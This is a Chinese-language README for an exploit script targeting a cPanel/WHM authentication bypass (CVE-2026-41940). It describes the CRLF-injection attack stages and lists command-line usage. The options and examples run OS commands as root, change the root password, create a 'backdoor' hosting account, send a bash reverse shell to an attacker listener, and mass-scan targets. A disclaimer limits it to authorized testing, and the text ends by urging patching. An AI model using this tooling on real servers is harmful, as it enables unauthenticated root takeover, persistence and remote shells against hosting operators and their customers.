免责声明: 本文档及关联脚本(
exploit.py)仅用于教育目的、安全研究和授权渗透测试。请勿将该软件用于您不拥有或未经明确许可测试的系统。
exploit.py 是一个演示 cPanel 与 WHM 中身份验证绕过漏洞(CVE-2026-41940)的脚本。该漏洞允许未认证的攻击者通过 CRLF 注入缺陷,将 root 会话注入守护进程缓存,最终在无需有效凭据的情况下获得 root 级 WHM 访问权限。
该漏洞利用 Basic Authentication 处理机制中的 CRLF(回车换行)注入漏洞,并结合会话传播缺陷。该脚本分四个阶段自动化执行攻击:
/login/ 或 /cgi/login.cgi),获取一个未认证的基线会话 Cookie(whostmgrsession)。cpsrvd 会话缓存。服务器的重定向响应会泄露生成的 security token(cpsess)。do_token_denied 将伪造会话传播到守护进程缓存——使其成为有效的已认证会话。/json-api/version),确认 root 级访问权限。requests 库pip install requests
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]
| 参数 | 描述 |
|---|---|
--target URL | 单个 WHM URL(例如 https://target:2087) |
--target-file FILE | 包含目标的文件(每行一个 ip:port)——自动启用检查模式 |
| 参数 | 描述 |
|---|---|
--threads N | 多目标模式下的并发线程数(默认:10) |
--hostname HOST | 覆盖 Host 头——在自动发现失败或主机名错误时使用 |
--timeout N | 每个请求的超时时间(秒)(默认:15) |
--retries N | 网络错误时的重试次数(默认:3) |
--cookie-name NAME | 强制指定会话 Cookie 名称(未指定时自动检测) |
--no-verify | 跳过第 4 阶段验证并继续执行 |
| 参数 | 描述 |
|---|---|
--check | 仅检查模式——验证漏洞但不利用(使用 --target-file 时自动设置) |
--password PASS | 将 root 密码更改为 PASS |
--api FUNC | 调用特定的 WHM JSON-API 函数 |
--api-params K=V,... | --api 的逗号分隔参数 |
--exec CMD | 通过 WHM scripts/run_script 执行操作系统命令(备用:rawexec) |
--session | 生成一个 root 一键登录 URL——请立即打开,token 过期很快 |
--shell | 进入交互式 WHM shell(仅限单目标) |
--dump | 转储服务器信息:版本、账户、DNS 区域、权限 |
--add-user USER PASS DOMAIN | 创建新的 cPanel 托管账户 |
--revshell LHOST LPORT | 向您的监听器发送 bash 反向 shell |
| 参数 | 描述 |
|---|---|
--output FILE | 将会话 token 和详细信息保存到 JSON 文件 |
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check
# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump
# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session
# Execute a command
python exploit.py --target https://target:2087 --exec "id"
# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell
# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'
# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20
# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json
使用 --shell 时,以下命令可用:
| 命令 | 描述 |
|---|---|
api <function> [k=v ...] | 调用 WHM JSON-API 函数(例如 api version) |
exec <command> | 通过 WHM 运行操作系统命令(例如 exec id) |
passwd <newpass> | 更改 root 密码 |
dump | 转储服务器信息 |
revshell <lhost> <lport> | 发送反向 shell |
add <user> <pass> <domain> | 创建 cPanel 账户 |
save <path> | 将当前会话保存到文件 |
exit / quit | 退出 shell |
请立即更新最新的 cPanel/WHM 安全补丁。